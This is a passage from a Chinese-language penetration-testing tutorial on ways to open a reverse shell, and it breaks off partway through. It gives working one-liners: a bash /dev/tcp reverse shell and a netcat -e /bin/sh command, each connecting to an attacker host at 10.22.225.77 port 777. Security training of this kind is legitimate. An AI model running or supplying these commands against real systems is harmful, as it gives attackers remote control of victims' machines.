反弹 shell 的 N 种方式
在实际的渗透测试过程中,一旦拿到高权限 shell,马上就会准备做流量代
理,尝试各种反向代理和正向代理,然后选择流量通透性较好的机器就要准备
内网渗透了,关于反向代理和正向代理,有时间我在写,比较杂,而且为了保
证各位的最佳阅读体验,所有的工具和方式我都要实测之后再整理发布相关知
识文章,这一次我来讲一下关于反弹 shell 的知识,这部分知识可能说起来一句
话也行:
bash -i >& /dev/tcp/10.22.225.77/777 0>&1
其中 10.22.225.77 为接受反弹 shell 的机器,777 为反弹 shell 的机器开放的
端口。
上述 bash 反弹 shell 语言想必日常渗透的都知道的,这也是用的最多的一
种方式,不过有时候 bash 无法反弹的时候,就可以试试其他的方法了,这也是
我在项目中遇到过的问题。
以下的所有反弹中,10.22.225.77 为接受反弹 shell 的机器,777 为反弹 sh
ell 的机器开放的端口。
**一、nc **反弹
如果有**-e** 参数:
nc -e /bin/sh 10.22.225.77 777
如果没有**-e** 参数:<